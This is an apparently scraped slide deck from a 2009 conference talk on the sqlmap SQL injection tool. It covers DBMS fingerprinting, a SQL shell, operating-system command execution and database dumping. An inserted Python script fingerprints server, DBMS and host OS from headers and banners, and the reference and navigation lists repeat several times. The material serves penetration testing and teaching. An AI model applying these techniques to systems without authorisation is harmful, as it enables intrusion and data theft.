- Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
- Python difflib, Python Software Foundation
- NULL (SQL), Wikipedia
- Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
- Insight on UNION query SQL injection, Bernardo Damele A. G.
- DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)

Questions?
Thanks for your attention.
Intercon III London – January 9 2009 33
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about the back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.) – known technique
Back-end DBMS operating system, by parsing the DBMS banner – over-looked technique
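The two passive checks described on this slide, as an added example (my own illustration, not sqlmap's fingerprinting code and not part of the talk): one parser for the HTTP response headers named above and one for a DBMS version banner in the formats returned by MySQL's @@version / version(), Microsoft SQL Server's @@version and PostgreSQL's version(). The header and banner samples are constructed, and the regular expressions are my simplification of what those banners contain. Run against your own application's responses, the same parsing shows exactly which stack and host details are disclosed without any extra request, which is the case for trimming the Server header and keeping version strings out of error pages.

```python
"""Passive stack fingerprinting from material the server sends anyway.

Added example, not sqlmap's code: one parser for HTTP response headers
(Server, X-Powered-By, X-AspNet-Version) and one for a DBMS version
banner as returned by MySQL's @@version / version(), Microsoft SQL
Server's @@version and PostgreSQL's version(). The sample strings
below are constructed; the regular expressions are my simplification.
"""
import re

# Distinctive fragments of real DBMS version strings; first match wins.
_DBMS_PATTERNS = [
    ("Microsoft SQL Server", re.compile(r"Microsoft SQL Server\s+(\d{4})")),
    ("PostgreSQL", re.compile(r"PostgreSQL\s+([\d.]+)")),
    # A bare MySQL banner starts with the version, e.g. "5.0.51a-3ubuntu5.4".
    ("MySQL", re.compile(r"^(\d+\.\d+\.\d+[a-z]?)")),
]

# Operating-system hints found in banners and Server headers. Distribution
# names come before the generic "linux" so the most specific hint wins.
_OS_HINTS = [
    ("Windows", re.compile(r"Windows NT|\bWin32\b|\bWin64\b", re.I)),
    ("Ubuntu", re.compile(r"ubuntu", re.I)),
    ("Debian", re.compile(r"debian", re.I)),
    ("Red Hat", re.compile(r"red ?hat|\.el\d", re.I)),
    ("FreeBSD", re.compile(r"freebsd", re.I)),
    ("Linux", re.compile(r"linux", re.I)),
]


def os_hint(text):
    """Return the OS name implied by a banner or header value, or None."""
    for name, pattern in _OS_HINTS:
        if pattern.search(text):
            return name
    return None


def fingerprint_http_headers(headers):
    """Web server, application technology and OS from response headers.

    headers: dict of header name -> value (names matched case-insensitively).
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    result = {"web_server": None, "technology": [], "os": None}
    server = lowered.get("server", "")
    if server:
        tokens = server.split()
        result["web_server"] = tokens[0]            # e.g. Apache/2.2.9
        result["os"] = os_hint(server)              # e.g. from "(Ubuntu)"
        # Modules advertised after the product, e.g. PHP/5.2.6 mod_ssl/2.2.9
        result["technology"] += [t for t in tokens[1:] if "/" in t]
        if tokens[0].startswith("Microsoft-IIS"):
            result["os"] = "Windows"
    if "x-powered-by" in lowered:
        result["technology"].append(lowered["x-powered-by"])
    if "x-aspnet-version" in lowered:
        result["technology"].append("ASP.NET/" + lowered["x-aspnet-version"])
    result["technology"] = list(dict.fromkeys(result["technology"]))  # dedupe
    return result


def fingerprint_dbms_banner(banner):
    """DBMS product, version and host OS from a single version banner."""
    result = {"dbms": None, "version": None, "os": os_hint(banner)}
    for name, pattern in _DBMS_PATTERNS:
        match = pattern.search(banner)
        if match:
            result["dbms"] = name
            result["version"] = match.group(1)
            break
    return result


# Constructed samples in the real formats of the respective products.
SAMPLE_APACHE_HEADERS = {
    "Server": "Apache/2.2.9 (Ubuntu) PHP/5.2.6 with Suhosin-Patch",
    "X-Powered-By": "PHP/5.2.6",
}
SAMPLE_IIS_HEADERS = {
    "Server": "Microsoft-IIS/6.0",
    "X-Powered-By": "ASP.NET",
    "X-AspNet-Version": "2.0.50727",
}
SAMPLE_MYSQL_BANNER = "5.0.51a-3ubuntu5.4"
SAMPLE_MSSQL_BANNER = (
    "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\n"
    "\tOct 14 2005 00:33:37\n"
    "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
    "\tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 2)"
)
SAMPLE_PG_BANNER = (
    "PostgreSQL 8.3.5 on i486-pc-linux-gnu, "
    "compiled by GCC gcc-4.3.real (Debian 4.3.2-1) 4.3.2"
)

if __name__ == "__main__":
    for headers in (SAMPLE_APACHE_HEADERS, SAMPLE_IIS_HEADERS):
        print("HTTP :", fingerprint_http_headers(headers))
    for banner in (SAMPLE_MYSQL_BANNER, SAMPLE_MSSQL_BANNER, SAMPLE_PG_BANNER):
        print("DBMS :", fingerprint_dbms_banner(banner))
```

The banner parser is where the "over-looked" part lives: the MySQL packaging suffix (3ubuntu5.4), the "on Windows NT 5.2" tail of the SQL Server string and the "i486-pc-linux-gnu ... (Debian ...)" compiler line of PostgreSQL each name the database host's operating system, and all three arrive in the same response that already carried the DBMS version.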
Intercon III London – January 9 2009 34
Second demo
"A demo, as in demolish or demonstration?" – Cyclops, X-Men Evolution
Intercon III London – January 9 2009 35
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.
Intercon III London – January 9 2009 36
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatypes, etc.
There is an option to dump the whole back-end DBMS.
Intercon III London – January 9 2009 37
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from the command line and/or a configuration file.
Options are documented in the user's manual with examples.
Intercon III London – January 9 2009 38
Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." – Richard Stallman
Intercon III London – January 9 2009 39
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time-based blind SQL injection technique
... but I am working on these and others.
Intercon III London – January 9 2009 40
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
Intercon III London – January 9 2009 41
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
Intercon III London – January 9 2009 42
References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A G
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Intercon III London – January 9 2009 43
Questions?
Thanks for your attention
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-